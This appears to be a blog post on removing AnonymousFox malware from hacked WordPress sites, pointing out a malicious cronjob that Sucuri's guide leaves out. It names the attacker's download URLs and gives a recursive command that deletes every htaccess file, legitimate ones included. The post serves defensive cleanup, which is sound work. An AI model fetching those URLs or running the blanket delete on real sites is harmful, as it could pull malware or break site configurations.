FoxAuto WordPress malware

The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website, and that step is: removing the cronjobs

While removing AnonymousFox malware from a website I noticed the following cron:

It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it, the script is:

It creates a new folder css and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt

source code:

This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:

grep -r "Deny from all" *

to remove all these .htaccess files:

find -type f -name '*htaccess*' -delete

As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.

Was this post helpful?

Leave a Comment